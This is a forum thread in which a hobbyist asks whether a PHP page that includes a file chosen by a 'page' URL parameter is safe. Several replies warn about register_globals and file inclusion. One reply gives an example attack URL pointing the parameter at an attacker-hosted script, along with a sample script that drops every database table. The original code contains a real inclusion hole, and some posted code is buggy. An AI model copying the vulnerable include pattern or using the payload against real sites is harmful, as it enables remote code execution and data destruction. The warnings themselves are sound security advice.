Here is the code for the index page of my chat site:

<html>
<head>
<meta name="keywords" content="chat, Sims, Sims 2, Sims 2 movies, movies, Sims99, ms510, ms creashuns, mastersimmer510, mastersimmer">
<meta name="description" content="The MS Creashuns Chat Room is a place for Sims 2 fans can come and chat with people with a common interest.">
<title>MS Creashuns Chat Room</title>
<link rel="stylesheet" type="text/css" href="chat.css">
</head>
<body>
<table width=100% border=0 cellspacing=0 cellpadding=0>
<tr><td class="all" background="#990000">
<table class="all" style="background:transparent;" align=center cellspacing=0 cellpadding=0>
<tr>
<td><h1>MS Creashuns Chat Room</h1></td>
<td align=right><img src="images/logo.gif" ALT="MS Creashuns Chat Room" width=115 height=115></td></tr></table></td></tr>
<tr><td><table border=0 style="background:transparent;" align=center cellspacing=0 cellpadding=0 width=100%><br></table></td></tr>
<tr width=50%><td>
<table class="all" style="background:transparent;" align=center cellspacing=0 cellpadding=0>
<tr>
<td class="all1" valign=top>
<p><font size=4>NAVIGATE</font><br><br>
<a href="index.php" title="Home">Home</a><br>
<a href="index.php?page=rules" title="General Rules">Rules</a><br>
<a href="index.php?page=faq" title="FAQ">FAQ</a><br>
<a href="chat/" title="Go Chat">Enter the Chat</a></p></td><td class="all2" valign=top>
<?
if ($page == "") {
include("announcements.txt"); } else {
include("$page.txt"); }
?>
<hr noshade color=white width=75%></td></tr>
</table></td></tr>
</table>
</body>
</html>

I know most of it isn't even PHP, but the part that is, is that a good idea? Basically what it does is uses the GET method to choose what text is displayed in the body of the page. If you want to see the actual thing, go here (http://mscreashuns.savefile.com/chat). If you click the links to the left, you will see that the main content changes, but the URL is not much different, it just adds "?page=(page_name)" to the end. Is this a good idea, or not? I know I could use includes to make everything but the content the same on each page, but this way I never have to modify this page, just the individual text files. Thanks! :D

:)

I can see no wrong with this.
And a visit to your website, shows it is working just fine!

There are certainly more complicated ways to make a navigate menu.
Methods so advanced, just to think of them, makes you sick.
Shockwave flashes, that not everybody can see, because have not latest plugin.
And so it goes. you know what I mean .....

I, for speaking my own personal opinion, like your simple way very much :)

As long as something works great with small efforts,
there is no need for any change.

/halojoy
:cool:

Yeah, I'm not finished with the Navigation, just questioning the technique for displaying the main content. The design is just sort of temporary. :D

Yeah, I'm not finished with the Navigation,
just questioning the technique for displaying the main content.
The design is just sort of temporary. :D How did you read my post?? :confused:
Maybe english is not your mothertongue ...
Speak about misinterpretate and misunderstand.

Okay, mate.
You better read my post, once again
What is okay, is okay.
What is not okay, maybe we can work to change.
Put in work to change what is aleady good?

Life is too short, for wasting your hours.
Isnt it?
Or are you too young to understand this fact.
Well, everybody's lifetimes are running.
Sooner or later, they will have to understand.
Or die.

:confused:

I understood your post just fine. I was just saying that I am going to change the navigation. I know it works fine, that was my intent, but I want something that looks better. Thank you for your input. ;)

Well, assuming $page is coming from a form, it means you're assuming register_globals is turned on, which is a poor idea in itself. Apart from that, it's fine, if you want visitors to be able to request any file on your entire system that has a name ending with ".txt".

if register globals on it can be a huggggeee security risk, except for it seems like not to much , because txt files can not do to much, but... just be careful :D

I use this in my template class:


function Content( $do ) {
if( !isset( $do ) || $do == "" || $do == "" ) {
$do = "./modules/home/";
$this->content = include( $do );
return$this->content;
} elseif ( !eregi("^[-?_?a-z0-9]+$",$area) && $area != "") { //Only allow a-z, 0-9, -, _ :)
//Let's stop them
$error = openerrortable( "1" );
return $error;
//Close if( !eregi("") ...
}
elseif ( file_exists("./" . $folder . "/" . $area . ".incphp") ) {
//Check if the file exists
$this->content = include("./modules/" . $do . "/");
return $this->content;
//Close elseif( file_ex ...
} else {
$error = openerrortable( "2" );
return $error;
}

Now i use that in a class system, and i'm opening different things, but that is a security messaure to take... :)

Well, I can assure you that there is no security risk, as those are the only text files I have. ;)

bro taking extra security precautions is always a good idea.... :|

Actually, register_globals is a huge security risk, as well as your method of displaying them. Case in point, what if someone at www.virus-makers.com had a PHP virus named "virus.txt"? And they typed in index.php?page=http://www.virus-makers.com/virus.txt - even though it's a text file, the PHP inside will be processed by the PHP engine.

Well, I can assure you that there is no security risk, as those are the only text files I have. ;)

That doesnt mean anything it could have anything with the extension of .txt for all we know it could be anything like a binary, malicious script coming through like shown previously. Firstly you should validate if the file actually exists on your server, use $_GET as at the moment I could post the data, have a cookie or anything that would still work with this page $_GET comes from the Query String so if its not there it doesnt get dealt with, at the moment it can come from anywhere a big reason why register_globals are now by default Off.

Supose urlfopen is on (is on, on most hosts)
Supose register_globals is on
Supose I enter the url http://www,yourwebsite.tld/yourfile.php?page=http://myhost.tld/evilscript.txt

And supose textfile.txt looks like this


<?PHP
$result = mysqlquery("SHOW TABLES");
while(list($table = mysql_fech_row($result))
{
mysql_query("DROP TABLE " . $table);
}

/* or some code that deletes files on disk */
?>

Just supose..

This scenario is very plausible imo

Meanwhile, those .txt files may be the only ones on your server now, but will you rememer to go back and fix your code in the future if there are ever any others?